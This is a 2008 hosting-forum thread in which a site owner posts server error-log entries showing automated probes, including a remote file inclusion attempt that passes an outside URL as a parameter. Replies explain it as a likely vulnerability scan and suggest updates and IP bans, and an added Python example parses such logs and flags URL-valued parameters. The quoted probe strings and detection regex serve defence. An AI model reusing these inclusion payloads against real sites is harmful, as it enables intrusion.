Web Hosting Forum | Lunarpages
Topic: Scary entries in server log
chasq
« on: January 05, 2008, 06:55:41 AM »

I am having problems with some pictures on my site. So I checked the ERROR LOG and found these entries:

[Sat Jan  5 03:52:53 2008] [error] [client 80.97.20.22] File does not exist: /home/oceans52/public_html//phpsecurityadmin/include/logout.php
[Sat Jan  5 03:51:35 2008] [error] [client 80.97.20.22] script not found or unable to stat: /home/oceans52/public_html//includes/tumbnail.php
[Sat Jan  5 03:49:02 2008] [error] [client 80.97.20.22] File does not exist: /home/oceans52/public_html//modules/fs/mod&pwd=casualpass&mod_root=http://trimedia-online.net/ihmank/id.txt
[Sat Jan  5 03:39:36 2008] [error] [client 219.94.145.104] script not found or unable to stat: /home/oceans52/public_html//includes/tumbnail.php
[Sat Jan  5 03:39:25 2008] [error] [client 219.94.145.104] File does not exist: /home/oceans52/public_html//phpsecurityadmin/include/logout.php
[Sat Jan  5 03:39:08 2008] [error] [client 219.94.145.104] File does not exist: /home/oceans52/public_html//modules/fs/mod&pwd=casualpass&mod_root=http://trimedia-online.net/ihmank/id.txt
[Sat Jan  5 01:51:46 2008] [error] [client 80.97.20.22] File does not exist: /home/oceans52/public_html//common/db.php



I googled ihmank/id.txt and found out that someone is trying to hack my site. Does anyone know what kind of attack my site is being subjected to? The blog I visited is at => http://websecurity.ro/blog/?s=ihmank%2Fid.txt

Chasq


white_hacker
« Reply #1 on: January 15, 2008, 08:13:20 PM »

Off the top of my head, the errors may be linked to a "local file inclusion" vulnerability attack. By accessing secret, hidden or misc files, attackers can obtain information that shouldn't be disclosed. Since common ways such as logs are typically harder to get at, files such as specially prepared JPGs can be used too. Once opened, attackers can upload all the code they want. Of course, without looking into it further, I may be wrong about what attack it is. But you mentioned having trouble with pictures. Graphics are commonly used in LFI. There are a few different methods to exploit this weakness. There's no indication from the entries that anything was successful. It could have just been an automated bot scanning for sites with vulnerabilities. I would keep an eye on the logs to see if similar odd entries show up. If you really wanted to, you could make sure all scripts are up to date, double-check folder/file permissions, and upload fresh copies of the pictures you have issues with. If you look up "local file inclusion", you can get a lot more info.
Toon_Dawg
« Reply #2 on: February 07, 2008, 02:24:26 PM »

I get random attacks as well. I believe what a lot of hackers do is get a list of active domain names and attempt to hit them by trying out scripts that are used on commonly installed scripts. For example, I see attempts in my server log trying to hack into a board directory off of my main domain, and I've never had one there. It's kind of like spammers just sending out millions of spam to random hotmail addresses that may or may not be valid addresses. They will hit some just out of luck.

It may or may not help, but I ban the offending IP addresses through cPanel in case they attempt to come back.
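An added example, not part of any post in this thread: one way to triage an Apache error log in the format quoted in the first post, counting per client the distinct missing paths and the requests that pass a URL as a parameter value (the `mod_root=http://...` shape seen above), to produce a candidate list for an IP ban. The function names, the `min_missing` threshold and every line in `SAMPLE_LOG` are assumptions constructed for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import unquote

LINE_RE = re.compile(
    r"^\[(?P<ts>[^\]]+)\] \[error\] \[client (?P<ip>[^\]]+)\] "
    r"(?P<msg>File does not exist|script not found or unable to stat): (?P<path>\S+)"
)
# A request parameter whose value is itself a URL (remote-include probe shape).
REMOTE_URL_RE = re.compile(r"[?&][\w\[\]]+=(?:https?|ftp)://", re.IGNORECASE)

# Constructed sample lines: documentation IP ranges, placeholder paths and hosts.
SAMPLE_LOG = """\
[Sat Jan  5 03:52:53 2008] [error] [client 192.0.2.10] File does not exist: /home/example/public_html//admin/include/logout.php
[Sat Jan  5 03:51:35 2008] [error] [client 192.0.2.10] script not found or unable to stat: /home/example/public_html//includes/thumb.php
[Sat Jan  5 03:49:02 2008] [error] [client 192.0.2.10] File does not exist: /home/example/public_html//modules/fs/mod&pwd=x&mod_root=http://probe.example/id.txt
[Sat Jan  5 03:39:08 2008] [error] [client 198.51.100.7] File does not exist: /home/example/public_html//modules/fs/mod&mod_root=http%3A%2F%2Fprobe.example/id.txt
[Sat Jan  5 02:10:00 2008] [error] [client 203.0.113.5] File does not exist: /home/example/public_html/favicon.ico
"""

def triage(log_text, min_missing=3):
    """Return {ip: {"remote_include": int, "missing": set, "flag": bool}}."""
    stats = defaultdict(lambda: {"remote_include": 0, "missing": set()})
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # not a missing-file error line
        path = unquote(m.group("path"))  # catch percent-encoded URLs too
        entry = stats[m.group("ip")]
        entry["missing"].add(path)
        if REMOTE_URL_RE.search(path):
            entry["remote_include"] += 1
    for entry in stats.values():
        # Flag on any remote-include probe, or on many distinct missing paths.
        entry["flag"] = (entry["remote_include"] > 0
                         or len(entry["missing"]) >= min_missing)
    return dict(stats)

def flagged_ips(log_text, min_missing=3):
    """Sorted list of client IPs worth reviewing for a ban."""
    return sorted(ip for ip, e in triage(log_text, min_missing).items() if e["flag"])

if __name__ == "__main__":
    for ip, e in sorted(triage(SAMPLE_LOG).items()):
        print(ip, e["remote_include"], len(e["missing"]),
              "FLAG" if e["flag"] else "ok")
```

A client with a single miss such as `favicon.ico` is left unflagged, so ordinary visitors do not end up on the deny list.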

chasq
« Reply #3 on: March 01, 2008, 06:51:11 AM »

That's a good idea about banning the IP addresses. How big is your list?